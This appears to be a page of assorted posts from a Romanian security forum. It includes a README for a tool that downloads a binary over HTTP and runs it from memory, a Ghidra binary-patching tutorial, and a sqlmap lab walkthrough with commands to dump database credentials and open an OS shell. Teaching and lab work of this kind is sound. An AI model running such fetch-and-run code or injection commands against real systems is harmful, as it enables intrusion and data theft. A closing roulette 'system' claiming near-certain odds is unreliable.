Leaderboard

Memit Execute a binary from memory, without touching the disk. Linux only. Available as both a Go module and a binary. Using the Go module The Command() method takes an io.Reader, so you can use it with things like an HTTP response body, a bytes.Buffer, etc. It provides an *exec.Cmd (via memit.Command(...)) so you can wire up stdin/out and configure other parameters just like you would with a regular command. package main import "github.com/liamg/memit" func main() { resp, _ := http.Get("https://.../mybinary") cmd, _, _ := memit.Command(resp.Body, "--args", "--go", "--here") cmd.Stderr = os.Stderr cmd.Stdin = os.Stdin cmd.Stdout = os.Stdout _ = cmd.Run() } Using the binary Grab the latest release and run it like this: memit https://.../mybinary -- # args for the actual binary can be put after the -- Sursa: https://github.com/liamg/memit

Ghidra 101: Binary Patching CRAIG YOUNG NOV 28, 2021 IT SECURITY AND DATA PROTECTION In this blog series, I will be putting the spotlight on useful Ghidra features you may have missed. Each post will look at a different feature and show how it helps you save time and be more effective in your reverse engineering workflows. Ghidra is an incredibly powerful tool, but much of this power comes from knowing how to use it effectively. There are several circumstances where it can be helpful to make a modification to code or data within a compiled program. Sometimes, it is necessary to fix a vulnerability or compatibility issue without functional source code or compilers. This can happen when source code gets lost, systems go out of support, or software firms go out of business. In case you should find yourself in this situation, keep calm and read on to learn how to do this within Ghidra. Until recently, Ghidra was rather limited in this capability. This changed with the summer 2021 release of Ghidra 10.0 which introduced the ability to export programs with proper executable formats for Windows (PE) and Linux (ELF). Ghidra versions before 10 or for executable formats besides PE and ELF require using a raw import and raw export and is generally far less robust. In this post, I will review a Windows x86 executable, but the general strategy is applicable more broadly with some nuances for specific platforms and architectures. Strategies The first step for preparing a program patch is to gauge the complexity/length of the required patch and identify roughly where it needs to be inserted. If the patch is short enough, it may be possible to directly replace existing code inline. Patches introducing completely new functionality generally cannot be written inline and will require a different strategy. In this scenario, we must locate unused bytes which are loaded from the program file into executable memory space. These code caves are commonly generated when an executable section requires specific byte alignment. Longer patches can be written into a code cave along with appropriate branching instructions to insert the patch code into the right code path. Let’s take an example to see this process in action. In case you haven’t seen them, MalwareTech has a fun set of reversing and exploitation challenges available online. Each reversing challenge presents an executable which, when executed, will display a message box containing the MD5 sum of a secret flag string. You are expected to recover the flag string using only static analysis techniques, but for this blog, we will be altering and then running the challenge program to directly print the flag. (Don’t worry, it’s not cheating if it is in the name of science, right?) Shellcode2.exe_ In this post, I will use the shellcode2 challenge, and I encourage readers to follow along and then attempt to repeat the process with a different challenge file. The objective for our patch is to reveal the flag value after it has been decoded by the shellcode and before it has been hashed. Let’s start by looking at how shellcode2.exe_ is structured: In this snippet, we see local­_bc being initialized as an MD5 object followed by the construction of a stack string. When looking at the end of the entry function, we can see where the flag is hashed and the message box is created: In this snippet, the MD5 object at local_bc is being referenced to invoke the MD5::digestString() method with the address of local_2c as input. A reference to the resulting hash is stored at local_c0. The instructions from 4023a2-4023b2 pass this value into the MessageBoxA API call with a particular window title and style. Patching The first patch we’ll look at is to change the arguments to MessageBoxA so that it prints the value from local_2c rather than the value referred by local_c0. The address of the hash is loaded into EAX with the MOV instruction at 4023a9 and then pushed to the stack as an argument for MesageBoxA. This will need to be patched so that the address of local_2c is pushed instead. The LEA (Load Effective Address) instruction allows us to do just that. Begin by right-clicking the MOV instruction and selecting Patch Instruction: The instruction will change to an editable field with autocompletion: Patch this to be LEA with the operands EAX, [EBP + -0x28] so that EAX receives the address of local_2c: Note that the use of -0x28 rather than -0x2c as an offset to EBP is to account for the original EBP being pushed to the stack before EBP is loaded with the new stack pointer. The resulting offset is converted to its two’s complement as shown here: The program can now be exported from the File -> Export Program menu as PE format. Running the exe file produces our new MessageBoxA: Sursa: https://www.tripwire.com/state-of-security/security-data-protection/ghidra-101-binary-patching/

Salut! Pentru cine este interesat Oracle Cloud ofera gratuit o instanta de VPS cu 4 vCPU, 24 GB RAM. Downside, trebuie sa faceti o autentificare cu cardul, adica vi se retrage o suma de 4 lei care apoi se va inapoia. Un tutorial pentru incepatori AICI

Parca si Azure oferea gratis ceva pana la 300 USD, nu stiu daca si GCP. Recomand doar grija cu ce faceti pe acolo sa nu va treziti ca dispar bani frumosi de pe card ulterior.

Attackers can use the tool to get into a database, and potentially the server! Sqlmap is capable of providing a sql shell into the database - allowing an attacker to potentially execute any arbitrary sql command. Moreover, sqlmap also has an option to provide the attacker with an OS shell, with which the attacker can execute any arbitrary OS commands! (Sql Injection leading to Command Injection!) Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks - so attackers can even use this tool to get your passwords! For defender Defenders can use sqlmap for penetration testing of their web applications, servers, and databases. Use the tool to crack week passwords, assess whether the database is run with restrictive privileges, and to detect any potential injection holes in the application Options Sqlmap is a command line tool, and just like any other unix utility, one can find all the options they need to know by simply invoking the -h flag. i.e sqlmap -h, which will display all the options the tool accepts. Essentially, to use sqlmap, all you need to know is the url of the target web application along with the parameters to target for injection. Here are the most common options to remember for using sqlmap: To fingerprint a database: sqlmap -u “URL?name=value" --data=“name=&name=value” --cookie=“name=value“ -f To identify Databse users, password, roles & privileges: sqlmap –u “” --users --password --privileges --roles To get database tables & columns sqlmap –u “” --tables --columns --dump There are numerous other options, all of which can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage Tutorial / Demo Installation Instructions All the demonstration are within a custom VM accesible by all students on dh2020pc00 machine. Grab a copy of CustomUbuntu804Server.zip from /virtual/injection/ directory on the dh2020pc00 machine. Ex: scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER cd /virtual/$USER unzip CustomUbuntu804Server.zip Run Vmplayer, open a VM you just unzipped, USE Nat or VMNET8 for Network Adapter setting Login with username root and password password Note down the ipaddress shown (/sbin/ifconfig should show you the ip address if you missed it). We will refer to $ipaddress as the ipaddress that showed up for you, for the subsequent steps. Tutorial Sqlmap has been installed on the custom VM that you just setup. from terminal sqlmap -h will show the options of sqlmap. The following tutorial uses the very vulnerably fourFours application accessible on the browser at $ipaddress/fourFours Fingerprint the database and server hosting fourFours using sqlmap: sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login" Get all tables of public database: sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public Get all columns and data of fourfouruser table from public database: sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser Dump all database tables entries: sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --dump-all Prompt to get an OS Shell! sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell

Mersi Dragos, incercam sa inteleg la ce se refera.

Majoritatea aplicatiilor de chat (Teams, Zoom, GoToMeeting, Google Chat) au optiune de screen sharing (impartasire / partajare ecran) prin care poti sa redai in timp real ce se intampla pe un monitor pe care l-ai selectat. Nu e o camera propriu-zisa, ci o optiune din aplicatie.

https://www.youtube.com/watch?v=_LWwqbHU8L0 https://www.youtube.com/watch?v=YA6SGQlVmcA

Camera interioara? Pe bune? Esti nascut in '41?

Fii atent aici: Bagi Rosu Rosu Negru continuu pana iti reuseste una. Dupa vezi daca: urmatoarea in serie e negru atunci 99% sigur data viitoare e seria: "R N N R N N R R R R" urmatoarea in serie e rosu atunci 30% sigur data viiroare seria e: "N R R N R R N N N N" Asta merge pe 60-70% din softuri mai noi de aprilie-2019. Ontopic: Postul e din 2009, sa-ti dea Domnul sanatate si noroc!